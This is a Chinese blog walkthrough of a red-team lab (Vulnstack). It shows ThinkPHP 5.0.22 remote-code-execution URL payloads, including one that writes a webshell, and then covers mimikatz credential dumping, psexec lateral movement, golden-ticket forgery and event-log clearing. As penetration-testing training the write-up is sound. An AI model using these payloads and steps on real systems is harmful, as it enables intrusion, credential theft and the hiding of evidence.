ATT&CK实战系列——红队实战

Posted 2022-10-28 exploitsec

一、环境配置

vlunstack是红日安全团队出品的一个实战环境，具体介绍请访问：http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

虚拟机密码

win7
sun\\heart 123.com
sun\\Administrator dc123.com
Win7双网卡模拟内外网

2008
sun\\admin 2020.com

网络环境配置如下：

登陆更改一下密码

把phpstudy开启，然后记住这里一定要把网卡配置到相应的位置

网络环境如下：

二、外网打点

使用nmap对外网ip段进行信息收集

nmap -sV 192.168.135.150

有个web站点80、3306 mysql，就先从web站点下手

ThinkPHP 5.0.22 任意命令执行getshell

payload：

1.利用system函数远程命令执行

http://localhost:9096/public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami


2.通过phpinfo函数写出phpinfo()的信息
http://localhost:9096/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


3.写入shell:
http://localhost:9096/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php

或者http://localhost:9096/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php echo 'ok';?>

打了一波发现是administrator权限

http://192.168.138.128/?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

这里就用工具getshell不那么麻烦了，内个蚁剑的编码器好像有点问题

我听说还有~师傅们留下的webshell在里面嗷

直接下载文件得到密码MD5解密

我是一个好人果断把大马删除掉，然后植入一个哥斯拉的shell搞

mysql弱口令

找到TP5连接数据库的文件

猜测账号密码都是root

三、内网渗透

上线CS

权限提升

信息收集

ipconfig /all #定位域控

Ladon 192.168.138.0/24 OnlinePC  # 多协议探测存活主机（IP、机器名、MAC地址、制造商）
Ladon 192.168.138.0/24 OsScan #多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）

mimikatz

获取用户密码已经NTLM、SID值

四、横向移动

直接用EW做代理

./ew_for_Win.exe -s ssocksd -l 8888

运行被防火墙拦截了，好家伙果断关闭防火墙

fscan扫描

MS17-010

扫描发现居然有MS17-010在win7上，虽然已经拿下这台机器了但还是试试

Psexec 横向拿下域控

SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons链接后，子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。

psexec 传递
psexec 是微软 pstools 工具包中最常用的一个工具，也是在内网渗透中的免杀渗透利器。psexec 能够在命令行下在对方没有开启 telnet 服务的时候返回一个半交互的命令行，像 telnet 客户端一样。原理是基于IPC共享，所以要目标打开 445 端口。另外在启动这个 psexec 建立连接之后对方机器上会被安装一个服务。

获取凭据后对目标网段进行端口存活探测，因为是 psexec 传递登录，这里仅需探测445端口

命令：portscan ip网段 端口 扫描协议（arp、icmp、none） 线程
例如：portscan 192.168.138.0/24 445 arp 200

黄金票据

在域控获得KRBTGT账户NTLM密码哈希和SID

黄金票据是伪造票据授予票据（TGT），也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心（KDC）证明用户已被其他域控制器认证。

黄金票据的条件要求：

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

伪造域的用户名：len
域的名称：SUN
域的SID:S-1-5-21-3388020223-1982701712-4030140183-1110
域的KRBTGT账户NTLM密码哈希：65dc23a67f31503698981f2665f9d858

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限，上面已经获得域控的 system 权限了，还可以使用黄金票据做权限维持，当域控权限掉后，在通过域内其他任意机器伪造票据重新获取最高权限。

WEB机 Administrator 权限机器->右键->Access->Golden Ticket

痕迹清理

windows

1.查看事件日志
run event_manager -i
2.删除事件日志
run event_manager -c
3.clearv命令清除目标系统的事件日志。

参考的大佬们博客：https://blog.csdn.net/qq_38626043/article/details/119141146
本文仅作靶场实战教程，禁止将本文演示的技术方法用于非法活动，违者后果自负。